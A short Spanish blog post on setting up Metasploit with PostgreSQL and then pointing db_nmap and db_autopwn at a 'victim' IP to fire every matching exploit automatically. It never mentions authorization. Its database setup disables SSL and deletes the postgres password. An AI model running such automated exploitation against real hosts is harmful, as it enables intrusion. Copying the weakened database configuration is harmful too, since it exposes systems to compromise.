Un quick jautu de como instalar esta metralleta, que dispara todas las balas (exploits) contra la maquina elegida.
En un post previo se tiene un metasploit configurado pero con mysql y sqlite, ahora vamos por el postgres
un rapido #apt-get install postgresql, y ya tenemos el postgresql 8.4 en la PC, ahora vamos por lo requerido segun el db_driver se necesita esta libreria para tenerlo instalado
#apt-get install libpq-dev
despues hacemos un
#gem install postgres
Vemos que tenemos instalado el postgresql, ahora segun los reportes el Metasploit esta generando errores en el certificado SSL, cada vez que te conectas a la BD, bueno vamos con los pasos para superarlo.
Editamos el archivo
# nano /etc/postgresql/8.4/main/postgresql.conf
Buscamos esta linea y comentamos el ssl = true
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
guardamos los cambios una reiniciada del servicio
#etc/init.d/postgresql restart
#su postgres -c psql
ALTER USER postgres WITH PASSWORD ‘tupass’;
\q
passwd -d postgres
su postgres -c passwd
Ahora vamos y ejecutamos el metasploit
En la imagen nos muestra un ejemplo de conexion pues hacemos eso un db_connect,
db_connect user:pass@192.168.0.2/metasploit3
El user : postgres
El pass : 'tu pass'
La base de datos: metasploit3 (previamente la creaste o no ??, puedes crear una al toque con el pgadmin3)
Una vez conectado a la base de dato
db_nmap IPdelavictima
un db_hosts para ver los datos de la misma, una vez con eso sacamos la metralleta
db_autopwn
Y empieza la carniceria ...
Fuente:
http://www.kalenarndt.com/security/backtrack-4-r1-db_autopwn-with-postgres-sql/
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
No hay comentarios.:
Publicar un comentario